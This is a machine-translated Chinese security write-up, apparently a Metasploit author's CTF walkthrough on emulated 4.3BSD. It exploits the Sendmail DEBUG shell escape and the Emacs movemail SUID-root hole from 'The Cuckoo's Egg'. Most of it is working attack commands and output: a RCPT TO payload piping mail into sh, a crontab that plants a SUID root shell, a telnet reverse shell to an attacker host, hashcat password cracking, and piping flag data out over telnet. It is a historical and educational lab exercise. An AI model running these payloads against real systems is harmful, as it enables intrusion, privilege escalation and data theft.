邮件shell命令到Sendmail
历史悠久的Sendmail拥有一个调试模式,用于验证邮件是否到达预定目的地。部分实现是shell转义功能,可用于运行任意命令。由于命令将成为邮件消息的一部分,因此必须剥离标头,以便干净地执行代码。
我们可以使用ncatSMTP协议进行测试并对其进行一些了解。sed(1)用于清理邮件消息。
wvu@kharak:~$ ncat -v 127.0.0.1 25 Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Connected to 127.0.0.1:25. 220 simh Sendmail 5.51/5.17 ready at Wed, 18 Dec 85 11:14:07 PST DEBUG 200 Debug set MAIL FROM:<test> queuename: assigned id AA00153, env=17934 setsender(<test>) --parseaddr(<test>) parseaddr-->17948=<test>: mailer 0 (local), host `', user `test' next=0, flags=0, alias 0 home="", fullname="" 250 <test>... Sender ok RCPT TO:<"| sed '1,/^$/d' | sh; exit 0"> --parseaddr(<"| sed '1,/^$/d' | sh; exit 0">) parseaddr-->2c980=<"| sed '1,/^$/d' | sh; exit 0">: mailer 0 (local), host `', user `"| sed '1,/^$/d' | sh; exit 0"' next=0, flags=0, alias 0 home="", fullname="" recipient: 2c980=<"| sed '1,/^$/d' | sh; exit 0">: mailer 0 (local), host `', user `"| sed '1,/^$/d' | sh; exit 0"' next=0, flags=10, alias 0 home="", fullname="" 250 <"| sed '1,/^$/d' | sh; exit 0">... Recipient ok DATA 354 Enter mail, end with "." on a line by itself PATH=/bin:/usr/bin:/usr/ucb:/etc export PATH sleep 60 . EOH ----- collected header ----- Return-Path: <g> Received: ?sfrom s .by j (v/Z) id i; b Resent-Date: a Date: a Resent-From: q From: q Full-Name: x Subject: Resent-Message-Id: <t.i@j> Message-Id: <t.i@j> ---------------------------- SENDALL: mode b, sendqueue: 2c980=<"| sed '1,/^$/d' | sh; exit 0">: mailer 1 (prog), host `', user `| sed '1,/^$/d' | sh; exit 0"' next=0, flags=10, alias 0 home="", fullname="" recipient: 17948=<test>: mailer 0 (local), host `', user `test' next=0, flags=1, alias 0 home="/", fullname="" queueing AA00153 queueing 2c980=<"| sed '1,/^$/d' | sh; exit 0">: mailer 1 (prog), host `', user `| sed '1,/^$/d' | sh; exit 0"' next=17948, flags=10, alias 0 home="", fullname="" 250 Ok <"| sed '1,/^$/d' | sh; exit 0">: mailer 1 (prog), host `', user `| sed '1,/^$/d' | sh; exit 0"' next=17948, flags=10, alias 0 home="", fullname="" disconnect: In 7 Out 6 <"| sed '1,/^$/d' | sh; exit 0">: mailer 1 (prog), host `', user `| sed '1,/^$/d' | sh; exit 0"' next=17948, flags=10, alias 0 home="", fullname="" ====finis: stat 0 e_flags 1 dropenvelope 17934 id=<null> flags=1 QUIT 221 simh closing connection ====finis: stat 0 e_flags 1 dropenvelope 17934 id="AA00152" flags=1 ^C wvu@kharak:~$
我们可以检查邮件队列中生成的假脱机文件,并验证shell命令是否正在执行。
simh# cd /usr/spool/mqueue simh# ls -la total 6 drwxrwxrwt 2 root 512 Dec 18 11:14 ./ drwxr-xr-x 10 root 512 Dec 18 10:36 ../ -rw------- 1 root 55 Dec 18 11:14 dfAA00153 -rw------- 1 root 0 Dec 18 11:14 lfAA00153 -rw------- 1 root 326 Dec 18 11:14 qfAA00153 -rw-r--r-- 1 daemon 157 Dec 18 11:15 syslog -rw-r--r-- 1 daemon 0 Sep 27 1983 syslog.0 -rw-r--r-- 1 daemon 0 Sep 27 1983 syslog.1 -rw-r--r-- 1 daemon 0 Sep 27 1983 syslog.2 -rw-r--r-- 1 daemon 0 Sep 27 1983 syslog.3 -rw-r--r-- 1 daemon 0 Sep 27 1983 syslog.4 -rw-r--r-- 1 daemon 0 Sep 27 1983 syslog.5 -rw-r--r-- 1 daemon 0 Sep 27 1983 syslog.6 -rw-r--r-- 1 daemon 0 Sep 27 1983 syslog.7 -rw-r--r-- 1 root 329 Dec 18 11:15 xfAA00153 simh# cat dfAA00153 PATH=/bin:/usr/bin:/usr/ucb:/etc export PATH sleep 60 simh# ps auxww | grep '^daemon' daemon 159 0.0 0.2 9 7 ? I 0:00 sleep 60 daemon 158 0.0 0.3 27 12 ? I 0:00 sh daemon 156 0.0 0.3 27 12 ? I 0:00 sh -c sed '1,/^$/d' | sh; exit 0 simh#
我们的sleep 60命令被发送到/bin/sh,并且假脱机文件中没有邮件头,因为sed它们被清除了。太酷了!
Emacs movemail利用'The Cuckoo's Egg'
书中的黑客用这个来根除他炮击的盒子。虽然本书的事件发生在4.2BSD上,但我们可以在4.3上做同样的事情,因为我已经/usr/src/contrib使用Emacs源导入了树。
让我们执行攻击,但使用我们自己的矢量,不会破坏atrun(8)。
准备SUID根 movemail
simh# cd /usr/src/contrib/emacs/etc simh# make movemail cc -o movemail -g movemail.c simh# cp movemail /etc simh# chmod 4755 /etc/movemail simh# ls -l /etc/movemail -rwsr-xr-x 1 root 15360 Dec 18 11:20 /etc/movemail* simh#
利用movemail通过crontab.local
whoami nobody (umask 0 && /etc/movemail /dev/null /usr/lib/crontab.local) ls -l /usr/lib/crontab.local -rw-rw-rw- 1 root 0 Dec 18 11:22 /usr/lib/crontab.local (echo "* * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh"; echo "* * * * * root rm -f /usr/lib/crontab.local") > /usr/lib/crontab.local cat /usr/lib/crontab.local * * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh * * * * * root rm -f /usr/lib/crontab.local ls -l /tmp/sh -rwsr-xr-x 1 root 23552 Dec 18 11:22 /tmp/sh /tmp/sh whoami root ls -l /usr/lib/crontab.local /usr/lib/crontab.local not found
请随时阅读该模块及其文档以获取更多详细信息。通过任意读写,还有很多其他向量可以升级到root。辅助crontab(5)对我来说似乎最直接。
奖励:钻石解决方案中的2个(SPOILERS)
这更像是一种预期的解决方案,而不是一种写作。复活节彩蛋引用了“The Cuckoo's Egg”的引用。
msf5 > use exploit/unix/smtp/morris_sendmail_debug msf5 exploit(unix/smtp/morris_sendmail_debug) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 msf5 exploit(unix/smtp/morris_sendmail_debug) > set lhost 192.168.1.3 lhost => 192.168.1.3 msf5 exploit(unix/smtp/morris_sendmail_debug) > run [*] Started reverse TCP double handler on 192.168.1.3:4444 [*] 127.0.0.1:25 - Connecting to sendmail [*] 127.0.0.1:25 - Enabling debug mode and sending exploit [*] 127.0.0.1:25 - Sending: DEBUG [*] 127.0.0.1:25 - Sending: MAIL FROM:<OL6ueX3yw5TVFnOp8svQqcYCTE> [*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0"> [*] 127.0.0.1:25 - Sending: DATA [*] 127.0.0.1:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc [*] 127.0.0.1:25 - Sending: export PATH [*] 127.0.0.1:25 - Sending: sh -c '(sleep 4387|telnet 192.168.1.3 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.3 4444 >/dev/null 2>&1 &)' [*] 127.0.0.1:25 - Sending: . [*] 127.0.0.1:25 - Sending: QUIT [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo YFSyo34voEAHn2Nx; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: ": Trying...: not found\r\nsh: Connected: not found\r\n" [*] Matching... [*] B is input... [*] Command shell session 1 opened (192.168.1.3:4444 -> 192.168.1.3:49389) at 2018-12-18 13:30:42 -0600 [!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells! [!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you whoami daemon grep hunter /etc/passwd hunter:IE4EHKRqf6Wvo:32765:31:Hunter Hedges:/usr/guest/hunter:/bin/sh cat /usr/spool/mail/hunter From cliff Wed Sep 10 12:34:42 1986 Received: by 2-of-diamonds (5.51/5.17) id AA00579; Wed, 10 Sep 86 12:34:42 PDT Date: Wed, 10 Sep 86 12:34:42 PDT From: cliff (Cliff Stoll) Message-Id: <8610210434.AA00579@2-of-diamonds> To: mcnatt@26.0.0.113 Subject: What do you know about the nesting habits of cuckoos? Status: RO He went looking for your Gnu-Emacs move-mail file.
“你对杜鹃的筑巢习惯有什么了解?” 我解释了Gnu-Emacs安全漏洞的工作原理。
wvu@kharak:~$ hashcat -ia 3 -m 1500 --force IE4EHKRqf6Wvo ?l?l?l?l?l?l?l?l [snip] IE4EHKRqf6Wvo:msfhack Session..........: hashcat Status...........: Cracked Hash.Type........: descrypt, DES (Unix), Traditional DES Hash.Target......: IE4EHKRqf6Wvo Time.Started.....: Tue Dec 18 13:33:17 2018 (57 secs) Time.Estimated...: Tue Dec 18 13:34:14 2018 (0 secs) Guess.Mask.......: ?l?l?l?l?l?l?l [7] Guess.Queue......: 7/8 (87.50%) Speed.Dev.#2.....: 14603.0 kH/s (823.72ms) @ Accel:1 Loops:1024 Thr:256 Vec:1 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 836665344/8031810176 (10.42%) Rejected.........: 0/836665344 (0.00%) Restore.Point....: 36864/456976 (8.07%) Candidates.#2....: rywwfou -> vkvcfnd Started: Tue Dec 18 13:31:50 2018 Stopped: Tue Dec 18 13:34:15 2018 wvu@kharak:~$
黑客显然不喜欢他的旧密码 - 对冲,jaeger,猎人和本森。他用一个新的密码lblhack一个接一个地替换它们。
su - hunter Password:msfhack ls -la total 18 drwx------ 2 hunter 512 Nov 6 18:19 . drwxr-xr-x 7 root 512 Nov 6 18:19 .. -rw------- 1 hunter 13 Nov 6 18:19 .history -rws--x--x 1 root 15360 Nov 6 18:19 movemail cat .history who ps -eafg
然而,入侵者输入了ps -eafg。奇怪。我从未见过有人使用过g旗。
msf5 exploit(unix/smtp/morris_sendmail_debug) > use exploit/unix/local/emacs_movemail msf5 exploit(unix/local/emacs_movemail) > set session -1 session => -1 msf5 exploit(unix/local/emacs_movemail) > set movemail /usr/guest/hunter/movemail movemail => /usr/guest/hunter/movemail msf5 exploit(unix/local/emacs_movemail) > set verbose true verbose => true msf5 exploit(unix/local/emacs_movemail) > run [*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc [*] Current shell is /bin/sh [*] $PATH is /bin:/usr/bin:/usr/ucb:/etc [+] SUID-root /usr/guest/hunter/movemail found [*] Preparing crontab with payload * * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh * * * * * root rm -f /usr/lib/crontab.local [*] Creating writable /usr/lib/crontab.local [+] Writing crontab to /usr/lib/crontab.local [!] Please wait at least one minute for effect [*] Exploit completed, but no session was created. msf5 exploit(unix/local/emacs_movemail) > sessions -1 [*] Starting interaction with 1... ls -l /tmp/sh -rwsr-xr-x 1 root 23552 Dec 18 11:36 /tmp/sh /tmp/sh whoami root /usr/games/adventure Welcome to adventure!! Would you like instructions? no You are standing at the end of a road before a small brick building. Around you is a forest. A small stream flows out of the building and down a gully. enter building You are inside a building, a well house for a large spring. There are some keys on the ground here. There is a shiny brass lamp nearby. There is food here. There is a bottle of water here. take keys OK take lamp OK leave You're at end of road again. go south You are in a valley in the forest beside a stream tumbling along a rocky bed. go south At your feet all the water of the stream splashes into a 2-inch slit in the rock. Downstream the streambed is bare rock. go south You are in a 20-foot depression floored with bare dirt. Set into the dirt is a strong steel grate mounted in concrete. A dry streambed leads into the depression. The grate is locked. unlock grate The grate is now unlocked. enter You are in a small chamber beneath a 3x3 steel grate to the surface. A low crawl over cobbles leads inward to the west. The grate is open. go west You are crawling over cobbles in a low passage. There is a dim light at the east end of the passage. There is a small wicker cage discarded nearby. take cage OK go west It is now pitch dark. If you proceed you will likely fall into a pit. light lamp Your lamp is now on. You are in a debris room filled with stuff washed in from the surface. A low wide passage with cobbles becomes plugged with mud and debris here, but an awkward canyon leads upward and west. A note on the wall says "magic word xyzzy". A three foot black rod with a rusty star on an end lies nearby. go west You are in an awkward sloping east/west canyon. go west You are in a splendid chamber thirty feet high. The walls are frozen rivers of orange stone. An awkward canyon and a good passage exit From east and west sides of the chamber. A cheerful little bird is sitting here singing. catch bird OK go west At your feet is a small pit breathing traces of white mist. An east passage ends here except for a small crack leading on. Rough stone steps lead down the pit. go down You are at one end of a vast hall stretching forward out of sight to the west. There are openings to either side. Nearby, a wide stone staircase leads downward. The hall is filled with wisps of white mist swaying to and fro almost as if alive. A cold wind blows up the staircase. There is a passage at the top of a dome behind you. Rough stone steps lead up the dome. go down You are in the hall of the mountain king, with passages off in all directions. A huge green fierce snake bars the way! release bird The little bird attacks the green snake, and in an astounding flurry drives the snake away. go sw You are in a secret canyon which here runs e/w. It crosses over a very tight canyon 15 feet below. If you go down you may not be able to get back up. go west You are in a secret canyon which exits to the north and east. A huge green fierce dragon bars the way! The dragon is sprawled out on a persian rug!! kill dragon With what? Your bare hands? yes Congratulations! You have just vanquished a dragon with your bare Hands! (unbelievable, isn't it?) You are in a secret canyon which exits to the north and east. There is a persian rug spread out on the floor! The body of a huge green dead dragon is lying off to one side. There is a flag here. take flag OK inventory You are currently holding the following: Set of keys Brass lantern Wicker cage 2 of Diamonds go east A little dwarf just walked around a corner, saw you, threw a little axe at you which missed, cursed, and ran away. You're in secret e/w canyon above tight canyon. There is a little axe here. take axe OK go east There is a threatening little dwarf in the room with you! One sharp nasty knife is thrown at you! It misses! You're in hall of mt king. A cheerful little bird is sitting here singing. throw axe at dwarf You killed a little dwarf. The body vanishes in a cloud of greasy black smoke. You're in hall of mt king. There is a little axe here. A cheerful little bird is sitting here singing. go up You're in hall of mists. Rough stone steps lead up the dome. go up You're at top of small pit. Rough stone steps lead down the pit. go east You're in bird chamber. go east You are in an awkward sloping east/west canyon. go east You're in debris room. A three foot black rod with a rusty star on an end lies nearby. xyzzy You're inside building. There is food here. There is a bottle of water here. drop flag Congratulations! You have completed the 2 of Diamonds challenge. The crypt(1) password for 2_of_diamonds.dat is `wyvern'. A large cloud of green smoke appears in front of you. It clears away to reveal a tall wizard, clothed in grey. He fixes you with a steely glare and declares, "this adventure has lasted too long." With that he makes a single pass over you with his hands, and everything around You fades away into a grey nothingness. You scored 65 out of a possible 366 using 36 turns. Your score qualifies you as a novice class adventurer. To achieve the next higher rating, you need 36 more points. crypt wyvern < /usr/games/lib/2_of_diamonds.dat | uuencode 2_of_diamonds.png | telnet 192.168.1.3 4444 Trying... Connected to 192.168.1.3. Escape character is '^]'. Connection closed by foreign host.
一个局外人永远不会猜到我们的秘密密码,“ 双足飞龙 ” - 当猜测我们的密码时,很多人会想到一个神话中有翼的龙?
wvu@kharak:~$ ncat -lv 4444 | uudecode Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 192.168.1.3. Ncat: Connection from 192.168.1.3:49444. write: Broken pipe wvu@kharak:~$ ls -l 2_of_diamonds.png ---------- 1 wvu 2075806812 131776 Dec 18 13:44 2_of_diamonds.png wvu@kharak:~$ chmod 644 2_of_diamonds.png wvu@kharak:~$ file 2_of_diamonds.png 2_of_diamonds.png: PNG image data, 500 x 700, 8-bit/color RGBA, non-interlaced wvu@kharak:~$ pngcheck -cv 2_of_diamonds.png File: 2_of_diamonds.png (131776 bytes) chunk IHDR at offset 0x0000c, length 13 500 x 700 image, 32-bit RGB+alpha, non-interlaced chunk pHYs at offset 0x00025, length 9: 2835x2835 pixels/meter (72 dpi) chunk sRGB at offset 0x0003a, length 1 rendering intent = perceptual chunk gAMA at offset 0x00047, length 4: 0.45455 chunk IDAT at offset 0x00057, length 131669 zlib: deflated, 32K window, superfast compression chunk IEND at offset 0x202b8, length 0 No errors detected in 2_of_diamonds.png (6 chunks, 90.6% compression). wvu@kharak:~$ md5 2_of_diamonds.png MD5 (2_of_diamonds.png) = 46ff82c72e7491a451fef2e335dcb912 wvu@kharak:~$
30年后,蠕虫转向了
我希望你喜欢这次旅行的记忆,并带着一点二进制开发和shell欺骗。希望你能够同时玩。虽然系统及其软件在今天可能不相关,但大多数相同的技术技能都是相关的,特别是对于那些刚接触该领域的人。